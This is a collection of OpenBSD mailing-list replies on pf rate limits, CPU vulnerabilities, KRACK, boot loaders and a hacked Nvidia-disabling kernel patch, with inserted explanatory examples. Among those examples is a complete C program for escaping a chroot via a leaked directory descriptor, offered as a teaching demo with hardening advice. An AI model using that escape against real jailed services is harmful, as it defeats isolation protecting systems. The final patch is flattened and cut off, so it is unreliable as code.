Re: chromium and firefox - myths and facts?
Maybe this time mail will be encoded properly.

> Chrome and Safari both derive from Apple WebKit which itself is a fork
> of the KHTML rendering engine developed by the KDE project, and has
> *always* been, LGPL licensed code since its first release in 1998.
> Yet today, Firefox is held up as the open-source darling and
> Chrome/Safari is seen as the proprietary devil.
> Go figure. :-)

But still Chrome has a purpose: to push people away from desktop programs to WebApps, because of all the advertisement, marketing and tracking possibilities WebApps give to companies, especially Google. WebApps also mean data is not stored locally, but remotely. Not to mention Chrome sends your history to Google servers when you log in to a Google Account (Gmail, YouTube). I know some people can write open-source WebApps and host them on their private servers or at least paid VPSes, but how many? Not to mention these WebApps will probably not cover every use-case and they are going to use some company WebApp anyway.
Re: Can SSH report successful connections to pf?
> At the end of a "pass" rule in pf.conf, the author adds:
>
>     max-src-conn 3, max-src-conn-rate 2/5, overload <abusers> flush global
>
> which means:
>
>     "any source can only have a total of three connections,
>     and they may not create them at a rate faster than two
>     every five minutes. If they do, they will be added to the
>     abusers table and every packet/session will be globally
>     dropped."
>
> I locked myself out of many boxes thanks to that.

As Peter pointed out, it is best to set a timeout/expiry date for IPs in the blocklist. One can also create a whitelist for your own IPs. Personally I checked the IP my ISP gave me, then checked by online services what AS number and CIDR this IP is contained in. Then I added it to the whitelist table. It creates some hole in the firewall, but a proactive firewall based on blocklists in itself isn't strong protection. It is mostly useful for performance reasons.
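An added example, not from the thread, of the arrangement described above as a pf.conf fragment: a persistent blocklist table, a whitelist table that bypasses the limiter, and the rate-limited rule. The table names and the 192.0.2.0/24 whitelist prefix are placeholders; put your ISP's CIDR there. Note that the rate in `max-src-conn-rate 2/5` is two connections per 5 *seconds*, not minutes.

```pf
# Added example (not from the thread). Sources that trip the limiter land in
# <abusers>; addresses in <whitelist> are never rate-limited.
table <abusers> persist
table <whitelist> persist { 192.0.2.0/24 }    # placeholder: your ISP's CIDR

# Banned sources are dropped before any other rule is evaluated.
block in quick on egress from <abusers>

# Own addresses: plain pass, no connection limits at all.
pass in quick on egress proto tcp from <whitelist> to (egress) port ssh

# Everyone else: at most 3 states per source and no more than 2 new
# connections per 5 seconds; offenders go to <abusers> and all their
# existing states are flushed.
pass in on egress proto tcp to (egress) port ssh \
    keep state (max-src-conn 3, max-src-conn-rate 2/5, \
                overload <abusers> flush global)
```

Check the syntax with `pfctl -nf /etc/pf.conf` before loading it. The expiry the thread recommends is not part of the rule itself: entries stay in `<abusers>` until removed, so run `pfctl -t abusers -T expire 86400` from root's crontab (for example every 10 minutes) to drop entries older than 24 hours, and `pfctl -t abusers -T show` to see who is currently banned.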
Re: For a FFS on an SSD, which of "-o" nil, "sync" &/ "softdep" is more data-safe and fast?
> Hi!
>
> If I understand mount(8) (http://man.openbsd.org/mount) right, FFS
> mounts have a metadata I/O mode and a data I/O mode. By default,
> metadata is accessed synchronously and data is accessed
> asynchronously.
>
> "-o sync" will force both to synchronous mode, and "-o softdep" would
> change the metadata I/O mode to the alternative softdep access mode.

No. softdep and async are different concepts.

Default: metadata, data accordingly: sync, async
Note that there is async - not softdep.
You can do the opposite by options: nosync, noasync
It would mean asynchronous mode for metadata and synchronous for data - which is stupid (slow and dangerous), so don't.

I think the defaults are quite good for an SSD. Maybe add noatime for some partitions.
Re: Kernel memory leaking on Intel CPUs?
Intel provided stable microcode for Skylake mitigating Spectre variant 2. Current status:
https://newsroom.intel.com/wp-content/uploads/sites/11/2018/02/microcode-update-guidance.pdf

When it comes to Meltdown: is OpenBSD going to release patches for 6.2? I don't see anything related to Meltdown in the errata, but maybe it is too early. I understand other OSes received the disclosed information about the bug a few months earlier.
Re: Kernel memory leaking on Intel CPUs?
There are some claims about Raspberry Pi. Here you go:

    We do not believe any generation of Raspberry Pi hardware is susceptible to either the Spectre or Meltdown vulnerabilities.
    https://twitter.com/EbenUpton/status/948999181309530116

Why Raspberry Pi isn't vulnerable to Spectre or Meltdown
https://www.raspberrypi.org/blog/why-raspberry-pi-isnt-vulnerable-to-spectre-or-meltdown/
Re: Kernel memory leaking on Intel CPUs?
Intel is probably waiting for Microsoft, Red Hat, Apple and the major cloud companies to update their OSes before the release of the Intel Security Advisory.

I am also curious: does OpenBSD also map the kernel into the userspace memory of processes? Could pledge protect against some scenarios exploiting these kinds of bugs?
JRE, Java and JavaFX
Hello,

I would like to know whether it is possible to execute a GUI app based on JavaFX using OpenBSD's package for the JRE. I tried to compile and run, but Maven says it can't find the JavaFX classes. I also tried to compile on Windows and then copy the target directory to OpenBSD, but again I see something similar:

/usr/local/jre-1.8.0/bin/java -cp target/app-0.1-SNAPSHOT.jar com.company.app.Main
Exception in thread "main" java.lang.NoClassDefFoundError: javafx/application/Application
	at java.lang.ClassLoader.defineClass1(Native Method)
	at java.lang.ClassLoader.defineClass(ClassLoader.java:763)
	at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
	at java.net.URLClassLoader.defineClass(URLClassLoader.java:467)
	at java.net.URLClassLoader.access$100(URLClassLoader.java:73)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:368)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:362)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.net.URLClassLoader.findClass(URLClassLoader.java:361)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
	at com.company1.app.Main.main(Main.java:7)
Caused by: java.lang.ClassNotFoundException: javafx.application.Application
	at java.net.URLClassLoader.findClass(URLClassLoader.java:381)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:424)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:335)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:357)
	... 13 more

Have a nice day.
Re: For the super paranoid
News from Reddit: "AMD Listened to us, and added a PSP disable option in their new AGESA version!"

    Not my picture (Credit to u/repo_code), but
    https://drive.google.com/file/d/1b4p3d-gtHbFvkUbHYC8HSIviL-1ssC7V/view

    My Gigabyte AB350 Gaming 3 also has a bios based on the new agesa version, though it doesn't have the PBS options by default, so I enabled them, flashed the new bios, and indeed the setting was there!

> In order for me to trust AMD's implementation, they first need to can
> that ridiculous Platform "Security" Processor. It is as useless and
> dangerous as Intel Management Engine, running unknown code.
>
> A more plausible attack would be an application using malloc() for a
> large segment of memory, and transmitting the "uninitialised" content,
> which could contain private keys, sensitive documents, etc. from
> applications that either don't zero the memory after finishing, or
> programs which have crashed and the memory is now freely available
> to other processes.
>
> It would be nice in those cases to have different
> keys for different pages, so that when a process is terminated, the
> kernel can (instruct the CPU to) overwrite the key with a new random
> number.
>
> On Sat, 11 Mar 2017 20:18:37 + (UTC)
> Christian Weisgerber wrote:
>
>> AMD thinks so. Last year they announced support for memory encryption
>> in future CPUs. The top two Google hits:
>>
>> http://amd-dev.wpengine.netdna-cdn.com/wordpress/media/2013/12/AMD_Memory_Encryption_Whitepaper_v7-Public.pdf
>>
>> https://events.linuxfoundation.org/sites/events/files/slides/AMD%20x86%20Memory%20Encryption%20Technology%20LSS%20Slides.pdf
>>
Re: Intel's Management Technology is indeed vulnerable
Intel's firmware bugs: Intel SA-00086

Intel ID: INTEL-SA-00086
Product family: Various
Impact of vulnerability: Elevation of Privilege
Severity rating: Important
Original release: Nov 20, 2017
Last revised: Nov 21, 2017
https://www.us-cert.gov/ncas/current-activity/2017/11/21/Intel-Firmware-Vulnerability

From gadgets.ndtv.com:

    Security research firm Positive Technologies has said it will demonstrate an exploit that allows the running of arbitrary unsigned code on any PC with an Intel 6th Gen 'Skylake' Core CPU or later. The security hole exists because of Intel's Management Engine, a tiny microprocessor that exists within the platform controller, or chipset, of every PC motherboard built for Intel processors. The Intel Management Engine (IME) was introduced to allow functions such as remote booting and administration, but it also handles the initialisation of the CPU and its power management.

Will Harris on twitter comments satirically:

    Intel advisory generator: "Multiple unspecified issues in unspecified component in unspecified platform of unspecified version allows unspecified process to access privileged content via unspecified vector."
Re: Guess what today is
Happy birthday and live long OpenBSD!
Re: About WPA2 compromised protocol
Stefan Sperling:
> Also this was *NOT* a protocol bug.
> arstechnica claimed such nonsense without any basis in fact and
> now everybody keeps repeating it :(

Actually, the researcher claimed that they are in the standard itself.
https://www.krackattacks.com/

    The weaknesses are in the Wi-Fi standard itself, and not in individual products or implementations. Therefore, any correct implementation of WPA2 is likely affected.

Some paragraphs remark about OpenBSD in a direct way.

    Paper

    Although this paper is made public now, it was already submitted for review on 19 May 2017. After this, only minor changes were made. As a result, the findings in the paper are already several months old. In the meantime, we have found easier techniques to carry out our key reinstallation attack against the 4-way handshake. With our novel attack technique, it is now trivial to exploit implementations that only accept encrypted retransmissions of message 3 of the 4-way handshake. In particular this means that attacking macOS and OpenBSD is significantly easier than discussed in the paper.

    Some attacks in paper seem hard

    We have follow-up work making our attacks (against for example macOS and OpenBSD) significantly more general and easier to execute. So although we agree that some of the attack scenarios in the paper are rather impractical, do not let this fool you into believing key reinstallation attacks cannot be abused in practice.

    How did you discover these vulnerabilities?

    When working on the final (i.e. camera-ready) version of another paper, I was double-checking some claims we made regarding OpenBSD's implementation of the 4-way handshake. In a sense I was slacking off, because I was supposed to be just finishing the paper, instead of staring at code. But there I was, inspecting some code I already read a hundred times, to avoid having to work on the next paragraph. It was at that time that a particular call to ic_set_key caught my attention. This function is called when processing message 3 of the 4-way handshake, and it installs the pairwise key to the driver. While staring at that line of code I thought "Ha. I wonder what happens if that function is called twice". At the time I (correctly) guessed that calling it twice might reset the nonces associated to the key. And since message 3 can be retransmitted by the Access Point, in practice it might indeed be called twice. "Better make a note of that. Other vendors might also call such a function twice. But let's first finish this paper...". A few weeks later, after finishing the paper and completing some other work, I investigated this new idea in more detail. And the rest is history.
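The quoted explanation is about one line of driver code; what it costs is easier to see with a toy model. The following C program is an added example, not from the thread, the KRACK paper or the OpenBSD source: `struct sta`, `install_key()` and `ks_word()` are my own stand-ins (the keystream is a splitmix64-style mixer, not AES-CCM; the only property used is that equal key and packet number give equal keystream). `install_key()` models the "installing the key resets the nonce" behaviour described above; with `hardened` set it ignores a re-install of the key already in place, which is the general shape of the fix, not the project's actual patch.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAME_LEN 16

/*
 * Per-station transmit state as a driver keeps it: the pairwise key and the
 * packet number (PN) used as the CCMP nonce. Hypothetical struct.
 */
struct sta {
	uint64_t	key;
	uint64_t	tx_pn;
	int		key_installed;
};

/*
 * Toy keystream: one 64-bit word per (key, PN, block) from a splitmix64-style
 * mixer. It stands in for the AES-CTR keystream of CCMP; the only property
 * that matters here is that equal (key, PN) inputs give equal keystream.
 */
static uint64_t
ks_word(uint64_t key, uint64_t pn, unsigned block)
{
	uint64_t z = key ^ (pn * 0x9E3779B97F4A7C15ULL) ^ ((uint64_t)block << 56);

	z = (z ^ (z >> 30)) * 0xBF58476D1CE4E5B9ULL;
	z = (z ^ (z >> 27)) * 0x94D049BB133111EBULL;
	return z ^ (z >> 31);
}

/*
 * Models the ic_set_key path discussed above: installing the key resets the
 * PN to zero. With hardened set, re-installing the key that is already in
 * place is ignored, so a retransmitted message 3 cannot reset the nonce.
 */
static void
install_key(struct sta *s, uint64_t key, int hardened)
{
	if (hardened && s->key_installed && s->key == key)
		return;
	s->key = key;
	s->tx_pn = 0;
	s->key_installed = 1;
}

/* Stream-encrypt one frame under the current PN, then advance the PN. */
static void
encrypt_frame(struct sta *s, const uint8_t *pt, uint8_t *ct)
{
	uint64_t pn = s->tx_pn++;
	unsigned i, j;

	for (i = 0; i < FRAME_LEN; i += 8) {
		uint64_t w = ks_word(s->key, pn, i / 8);
		for (j = 0; j < 8; j++)
			ct[i + j] = pt[i + j] ^ (uint8_t)(w >> (8 * j));
	}
}

/*
 * Runs the handshake scenario and returns 1 if an attacker who knows the
 * first frame recovers the second from keystream reuse, 0 otherwise.
 */
int
demo_reinstall(int hardened)
{
	struct sta s = { 0, 0, 0 };
	const uint64_t ptk = 0x0123456789ABCDEFULL;	/* constructed PTK */
	uint8_t known[FRAME_LEN], secret[FRAME_LEN];
	uint8_t c1[FRAME_LEN], c2[FRAME_LEN], guess[FRAME_LEN];
	unsigned i;

	memcpy(known, "GET / HTTP/1.0\r\n", FRAME_LEN);	/* constructed frames */
	memcpy(secret, "password=hunter2", FRAME_LEN);

	install_key(&s, ptk, hardened);	/* message 3 arrives, key installed */
	encrypt_frame(&s, known, c1);	/* sent with PN 0 */
	install_key(&s, ptk, hardened);	/* attacker replays message 3 */
	encrypt_frame(&s, secret, c2);	/* PN 0 again if vulnerable */

	/* c1 ^ c2 == known ^ secret whenever the keystream was reused. */
	for (i = 0; i < FRAME_LEN; i++)
		guess[i] = c1[i] ^ c2[i] ^ known[i];
	return memcmp(guess, secret, FRAME_LEN) == 0;
}

int
main(void)
{
	printf("vulnerable: attacker recovers plaintext = %d\n", demo_reinstall(0));
	printf("hardened:   attacker recovers plaintext = %d\n", demo_reinstall(1));
	return 0;
}
```

The point of the exercise is that no key is broken: the attacker only needs the access point's message 3 to be replayable and one frame of known plaintext (protocol headers are enough in practice) to strip the keystream from the next frame sent under the reset nonce.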
softraid i/o error 5 @ CRYPTO block
Hello

During a recent update from an older -current amd64 to the newest -current amd64, the kernel printed a softraid/CRYPTO error. This error message was printed after the re-linking of the kernel, which failed. What does this mean?

Small part of dmesg:

sd1 at scsibus1 targ 1 lun 0: SCSI2 0/direct fixed
sd1: 71682MB, 512 bytes/sector, 146805279 sectors
root on rd0a swap on rd0b dump on rd0b
softraid0: sd1: i/o error 5 @ CRYPTO block 27426768
syncing disks...
OpenBSD 6.2-current (GENERIC.MP) #149: Sat Oct 14 14:21:11 MDT 2017
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/GENERIC.MP

*** full dmesg: https://paste.opensuse.org/ebf3782c

OpenBSD 6.2-current (RAMDISK_CD) #147: Sat Oct 14 14:25:36 MDT 2017
    dera...@amd64.openbsd.org:/usr/src/sys/arch/amd64/compile/RAMDISK_CD
real mem = 632704 (6018MB)
avail mem = 6116085760 (5832MB)
mainbus0 at root
bios0 at mainbus0: SMBIOS rev. 2.7 @ 0xe6df0 (39 entries)
bios0: vendor Acer version "V2.21" date 12/16/2013
bios0: Acer Aspire E1-531G
acpi0 at bios0: rev 2
acpi0: tables DSDT FACP UEFI ASF! HPET APIC MCFG SSDT BOOT ASPT DBGP FPDT SSDT SSDT SSDT
acpimadt0 at acpi0 addr 0xfee0: PC-AT compat
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: Intel(R) Pentium(R) CPU B960 @ 2.20GHz, 2195.37 MHz
cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES64,MWAIT,DS-CPL,EST,TM2,SSSE3,CX16,xTPR,PDCM,PCID,SSE4.1,SSE4.2,x2APIC,POPCNT,DEADLINE,XSAVE,NXE,RDTSCP,LONG,LAHF,PERF,ITSC,SENSOR,ARAT
cpu0: 256KB 64b/line 8-way L2 cache
cpu0: apic clock running at 99MHz
cpu0: mwait min=64, max=64, C-substates=0.2.1.1.2, IBE
cpu at mainbus0: not configured
ioapic0 at mainbus0: apid 0 pa 0xfec0, version 20, 24 pins
acpiprt0 at acpi0: bus 0 (PCI0)
acpiprt1 at acpi0: bus -1 (P0P1)
acpiprt2 at acpi0: bus 2 (RP01)
acpiprt3 at acpi0: bus 3 (RP02)
acpiprt4 at acpi0: bus -1 (RP03)
acpiprt5 at acpi0: bus -1 (RP04)
acpiprt6 at acpi0: bus -1 (RP05)
acpiprt7 at acpi0: bus -1 (RP06)
acpiprt8 at acpi0: bus -1 (RP07)
acpiprt9 at acpi0: bus -1 (RP08)
acpiprt10 at acpi0: bus 1 (PEG0)
acpiprt11 at acpi0: bus -1 (PEG1)
acpiprt12 at acpi0: bus -1 (PEG2)
acpiprt13 at acpi0: bus -1 (PEG3)
acpiec0 at acpi0
acpicpu at acpi0 not configured
"10250759" at acpi0 not configured
"ETD0500" at acpi0 not configured
"INT3F0D" at acpi0 not configured
"PNP0C0A" at acpi0 not configured
"ACPI0003" at acpi0 not configured
"PNP0C0C" at acpi0 not configured
"PNP0C0D" at acpi0 not configured
"PNP0C0E" at acpi0 not configured
"PNP0C14" at acpi0 not configured
"PNP0C14" at acpi0 not configured
"INT340E" at acpi0 not configured
pci0 at mainbus0 bus 0
pchb0 at pci0 dev 0 function 0 "Intel Core 2G Host" rev 0x09
ppb0 at pci0 dev 1 function 0 "Intel Core 2G PCIE" rev 0x09: msi
pci1 at ppb0 bus 1
1:0:0: mem address conflict 0xfff8/0x8
vendor "NVIDIA", unknown product 0x1140 (class display subclass VGA, rev 0xa1) at pci1 dev 0 function 0 not configured
vga1 at pci0 dev 2 function 0 "Intel HD Graphics 2000" rev 0x09
wsdisplay1 at vga1 mux 1: console (80x25, vt100 emulation)
"Intel 7 Series MEI" rev 0x04 at pci0 dev 22 function 0 not configured
ehci0 at pci0 dev 26 function 0 "Intel 7 Series USB" rev 0x04: apic 0 int 16
usb0 at ehci0: USB revision 2.0
uhub0 at usb0 configuration 1 interface 0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
"Intel 7 Series HD Audio" rev 0x04 at pci0 dev 27 function 0 not configured
ppb1 at pci0 dev 28 function 0 "Intel 7 Series PCIE" rev 0xc4: msi
pci2 at ppb1 bus 2
2:0:0: mem address conflict 0xf800/0x800
bge0 at pci2 dev 0 function 0 "Broadcom BCM57785" rev 0x10, BCM57765 B0 (0x57785100): msi, address b8:88:e3:d3:08:70
brgphy0 at bge0 phy 1: BCM57765 10/100/1000baseT PHY, rev. 4
sdhc0 at pci2 dev 0 function 1 "Broadcom SD Host Controller" rev 0x10: apic 0 int 17
sdhc0: SDHC 3.0, 200 MHz base clock
sdmmc0 at sdhc0: 8-bit, sd high-speed, mmc high-speed, dma
vendor "Broadcom", unknown product 0x16be (class system subclass miscellaneous, rev 0x10) at pci2 dev 0 function 2 not configured
vendor "Broadcom", unknown product 0x16bf (class system subclass miscellaneous, rev 0x10) at pci2 dev 0 function 3 not configured
ppb2 at pci0 dev 28 function 1 "Intel 7 Series PCIE" rev 0xc4: msi
pci3 at ppb2 bus 3
iwn0 at pci3 dev 0 function 0 "Intel Centrino Advanced-N 6200" rev 0x35: msi, MIMO 2T2R, MoW, address 00:27:10:a7:bf:cc
ehci1 at pci0 dev 29 function 0 "Intel 7 Series USB" rev 0x04: apic 0 int 23
usb1 at ehci1: USB revision 2.0
uhub1 at usb1 configuration 1 interface 0 "Intel EHCI root hub" rev 2.00/1.00 addr 1
"Intel HM77 LPC" rev 0x04 at pci0 dev 31 function 0 not configured
ahci0 at pci0 dev 31 function 2 "Intel 7 Series AHCI" rev 0x04: msi, AHCI 1.3
ahci0: port 0: 3.0Gb/s
ahci0: port 2: 1.5Gb/s
scsibus0 at ahci0: 32 targets
sd0 at scsibus0 targ 0 lun 0: SCSI3 0/direct fixed naa.5000c5005c9384dd
sd0: 476940MB, 512 bytes/sector, 976773168 sectors
cd0 at
Re: Flaw resides in BTB helps bypass ASLR
> if you read the paper, you will notice that they only tested on Ubuntu and
> OSX,
> neither of which actually ship with ASLR enabled by default if I remember
> correctly.

https://wiki.ubuntu.com/Security/Features
Re: VMM test
>> Hi Everybody,
>>
>> I would like to give a try to vmm. If I do so, which os can I expect
>> to make it work? openbsd ok I guess. Linux? Windows?

> OpenBSD only, as of now.

Does it support both i386 and amd64 OpenBSD guests?
Re: Unexpected behavior in su/doas
> > This is just one mechanism on tty, there are others. On other
> > descriptors there are other abilities.
>
> Would you mind explaining this a little bit. I don't really mean the
> sudo/doas part.
>
> How to do operations without retaining access to a tty?
>
> What other descriptors?

Example: if you have a file descriptor to a directory outside the chroot and you are the root user, you can escape the chroot.
https://filippo.io/escaping-a-chroot-jail-slash-1/
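As an added example, not from the thread or the linked article, here is the escape just described as a self-contained C program. `demo_chroot_escape()` is my own name and construction: it creates an empty jail directory under /tmp, keeps a descriptor to the real `/` open, enters the jail, shows that `/etc` is gone, then uses the saved descriptor to walk back out. It needs root (or CAP_SYS_CHROOT on Linux) to actually chroot; without that privilege it reports that and does nothing else.

```c
#define _DEFAULT_SOURCE
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Added example: a directory fd obtained before chroot(2) lets a root
 * process walk back out of the jail. Returns 1 if the jail was entered and
 * escaped, 0 if chroot(2) is not permitted for this user, -1 on any
 * unexpected failure.
 */
int
demo_chroot_escape(void)
{
	const char *jail = "/tmp/chroot_escape_demo";	/* constructed jail */
	struct stat st;
	int outside, i, saved;

	if (mkdir(jail, 0700) == -1 && errno != EEXIST)
		return -1;

	/* The "leaked" descriptor: a directory outside the future root. */
	outside = open("/", O_RDONLY);
	if (outside == -1)
		return -1;

	if (chroot(jail) == -1) {
		saved = errno;
		close(outside);
		rmdir(jail);
		return saved == EPERM ? 0 : -1;
	}
	if (chdir("/") == -1)
		return -1;

	/* Inside the empty jail the real /etc is not reachable. */
	if (stat("/etc", &st) == 0)
		return -1;

	/*
	 * fchdir() moves the cwd to the saved directory, which lies outside
	 * the current root, so ".." is no longer clamped at the jail. Walk up
	 * to the real root and make it the root directory again.
	 */
	if (fchdir(outside) == -1)
		return -1;
	for (i = 0; i < 64; i++)
		if (chdir("..") == -1)
			return -1;
	if (chroot(".") == -1)
		return -1;
	close(outside);
	rmdir(jail);		/* visible again now that we are outside */

	/* Proof: the real /etc is back. */
	return stat("/etc", &st) == 0 ? 1 : -1;
}

int
main(void)
{
	switch (demo_chroot_escape()) {
	case 1:
		puts("escaped the chroot via the leaked directory fd");
		return 0;
	case 0:
		puts("chroot(2) needs root; run as root to see the escape");
		return 0;
	default:
		puts("unexpected failure");
		return 1;
	}
}
```

The practical lesson for daemons that chroot is the usual one: close every directory descriptor first, drop root right after chroot(2) so `chroot(".")` is no longer available, and on OpenBSD additionally pledge(2) without the "wpath"/"cpath"-style promises the program does not need.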
Re: 6.0-stable panic
dhill () mindcry ! org also posted a message to the bugs mailing list, probably about this issue.
Title/subject: KASSERT((sk->inp == NULL) || (sk->inp->inp_pf_sk == NULL));
http://marc.info/?l=openbsd-bugs=147472138723508=2

I can also confirm that relayd is triggering this kernel panic on my system via the exit syscall. I have posted my relayd.conf in the mentioned thread. Maybe you could post yours too, so we could check for similarities.
Re: Dual booting - can't boot OpenBSD from Windows 10 bootloader
> Thank you all for your answers. I cannot use grub or lilo as some of
> you pointed out because grub is i386 only and lilo isn't even in
> ports, and I don't have linux installed.

Neither do I, but I have Grub2 (from Debian amd64) and OpenBSD amd64 ;)
You don't need to install any Gnu/Linux system to have a bootloader from Gnu/Linux. You just need to prepare a pendrive to boot a liveCD *once* and install the lilo or Grub2 bootloader, but there is no need to install the whole system. I must admit that I have an additional 50MB partition with an ext2 filesystem for the bootloader.
Dual booting - can't boot OpenBSD from Windows 10 bootloader
I installed OpenBSD before it had UEFI support, so I installed in Legacy Boot mode (I have a UEFI capable laptop). I personally use Grub2 installed via the debian live amd64 standard image. I don't have Gnu/Linux installed. I only have the bootloader from Debian. I have Windows 8.1 and OpenBSD amd64.

# cat /mnt/ext2/grub/grub.cfg \
> | grep -v -e ^# -e ^[:space:]*$
GRUB_DEFAULT=0
GRUB_TIMEOUT=5
GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT="quiet"
GRUB_CMDLINE_LINUX=""
menuentry "Windows" --class os {
	set root=(hd0,2)
	chainloader (hd0,msdos2)+1
}
menuentry "OpenBSD" {
	set root=(hd0,4)
	chainloader +1
}

Grub2 is faster than the Windows bootloader.
Re: graphics acceleration, DRI2, DRM problem
I think that the actual, real job is done by:

aml_evalname(sc, node, "_OFF", 0, NULL, )
or
aml_evalinteger(sc, node, "_OFF", 0, NULL, )

inside the acpi.c file. The only good thing about this patch is that it works for me.
Re: graphics acceleration, DRI2, DRM problem
> > +file dev/pci/nvdsbl.c
>
> can you include this file? and any new .h files as well?

I think that this was just for registering a dummy driver for that Nvidia device. It does nothing useful itself.

# cat /usr/src/sys/dev/pci/nvdsbl.c
/* $OpenBSD: nvdsbl.c,v 0.1 2015/07/28 12:00:01 somebody Exp $ */

/*
 * Driver changes power state / disables Nvidia GPU
 */

/* The usual headers for a minimal OpenBSD PCI driver. */
#include <sys/param.h>
#include <sys/systm.h>
#include <sys/device.h>

#include <dev/pci/pcireg.h>
#include <dev/pci/pcivar.h>
#include <dev/pci/pcidevs.h>

struct nvdsbl_softc {
	struct device		dev;
	struct pci_attach_args	nvdsbl_pa;
};

int	nvdsbl_probe(struct device *, void *, void *);
void	nvdsbl_attach(struct device *, struct device *, void *);

struct cfattach nvdsbl_ca = {
	sizeof(struct nvdsbl_softc), nvdsbl_probe, nvdsbl_attach, NULL, NULL
};

struct cfdriver nvdsbl_cd = {
	NULL, "nvdsbl", DV_DULL
};

/* NVIDIA (vendor 0x10de), device 0x1140: the discrete GPU in this laptop. */
static const struct pci_matchid nvdsbl_devices[] = {
	{ 0x10de, 0x1140 }
};

int
nvdsbl_probe(struct device *parent, void *match, void *aux)
{
	/* pci_matchbyid() returns nonzero when vendor/device is in the table. */
	return (pci_matchbyid((struct pci_attach_args *)aux, nvdsbl_devices,
	    nitems(nvdsbl_devices)));
}

void
nvdsbl_attach(struct device *parent, struct device *self, void *aux)
{
	printf("inside pci nvdsbl attach\n");
}
Re: graphics acceleration, DRI2, DRM problem
This is totally fucked up code, but if you like hazard... I mean that I really just called some random ACPI (aml) methods not knowing what they should do. Additionally this code is for my laptop. I have a GEFORCE 620M GPU, so I added this to pcidevs. Another thing is that the patched code recognizes my GPU device through the ACPI name "\\_SB_.PCI0.PEG0.PEGP". I discovered the name when I was using the Linux kernel's module called acpi_call. Other laptops may have differently named GPUs. You use this at your own risk and you must *not* report bugs to the Project when using the patched kernel.

File: GENERIC           Status: Locally Modified
   Working revision:    1.427
   Repository revision: 1.427   /cvs/src/sys/arch/amd64/conf/GENERIC,v
   Commit Identifier:   xNzAQvg5oqM2b0pn

File: acpi.c            Status: Locally Modified
   Working revision:    1.313
   Repository revision: 1.313   /cvs/src/sys/dev/acpi/acpi.c,v
   Commit Identifier:   h0GHFDGWnEdswfbK

File: dsdt.c            Status: Locally Modified
   Working revision:    1.223
   Repository revision: 1.223   /cvs/src/sys/dev/acpi/dsdt.c,v
   Commit Identifier:   SBTJg3diM8lXHXRE

File: files.pci         Status: Locally Modified
   Working revision:    1.324
   Repository revision: 1.324   /cvs/src/sys/dev/pci/files.pci,v
   Commit Identifier:   aeD3LK9Qomrjecge

File: pcidevs           Status: Locally Modified
   Working revision:    1.1802
   Repository revision: 1.1802  /cvs/src/sys/dev/pci/pcidevs,v
   Commit Identifier:   ZupaPoe9OBu6iKll

File: pcidevs.h         Status: Locally Modified
   Working revision:    1.1796
   Repository revision: 1.1796  /cvs/src/sys/dev/pci/pcidevs.h,v
   Commit Identifier:   Z3aUcOQiFLoINK6d

File: pcidevs_data.h    Status: Locally Modified
   Working revision:    1.1791
   Repository revision: 1.1791  /cvs/src/sys/dev/pci/pcidevs_data.h,v
   Commit Identifier:   Z3aUcOQiFLoINK6d

Index: sys/arch/amd64/conf/GENERIC === RCS file: /cvs/src/sys/arch/amd64/conf/GENERIC,v retrieving revision 1.427 diff -u -p -r1.427 GENERIC --- sys/arch/amd64/conf/GENERIC 3 Aug 2016 17:23:38 - 1.427 +++ sys/arch/amd64/conf/GENERIC 19 Aug 2016 21:31:07 - 
@@ -11,7 +11,7 @@ machineamd64 include"../../../conf/GENERIC" -maxusers 80 # estimated number of users +maxusers 100 # estimated number of users option USER_PCICONF# user-space PCI configuration @@ -22,10 +22,14 @@ option MTRR# CPU memory range attribu #optionKGDB# Remote debugger support; exclusive of DDB #option"KGDB_DEVNAME=\"com\"",KGDBADDR=0x2f8,KGDBRATE=9600 -option NTFS# NTFS support +#optionNTFS# NTFS support option HIBERNATE # Hibernate support + +option HZ=300 + config bsd swap generic +#optionDEBUG mainbus0 at root @@ -399,6 +403,7 @@ adw*at pci? # AdvanSys ULTRA WIDE SC pcscp* at pci? # AMD 53c974 PCscsi-PCI SCSI #trm* at pci? # Tekram DC-3x5U SCSI Controllers vmwpvs*at pci? # VMware ParaVirtual SCSI +nvdsbl* at pci? # Nvidia PCI Driver for disabling nvme* at pci? # NVMe controllers scsibus* at scsi? Index: sys/dev/acpi/acpi.c === RCS file: /cvs/src/sys/dev/acpi/acpi.c,v retrieving revision 1.313 diff -u -p -r1.313 acpi.c --- sys/dev/acpi/acpi.c 28 Jul 2016 21:57:56 - 1.313 +++ sys/dev/acpi/acpi.c 19 Aug 2016 21:31:44 - @@ -562,11 +562,11 @@ acpi_getpci(struct aml_node *node, void { const char *pcihid[] = { ACPI_DEV_PCIB, ACPI_DEV_PCIEB, "HWP0002", 0 }; struct acpi_pci *pci, *ppci; - struct aml_value res; + struct aml_value res,res2; struct acpi_softc *sc = arg; pci_chipset_tag_t pc = NULL; pcitag_t tag; - uint64_t val; + uint64_t val,val2; uint32_t reg; if (!node->value || node->value->type != AML_OBJTYPE_DEVICE) @@ -620,6 +620,35 @@ acpi_getpci(struct aml_node *node, void pci->bus, pci->dev, pci->fun, aml_nodename(node)); + + bool czyNvidiaGPU = false; +if (!(strcmp("\\_SB_.PCI0.PEG0.PEGP",aml_nodename(node +czyNvidiaGPU = true; + +if (czyNvidiaGPU) { +printf("bedzie evalname na GPU\n"); +bool 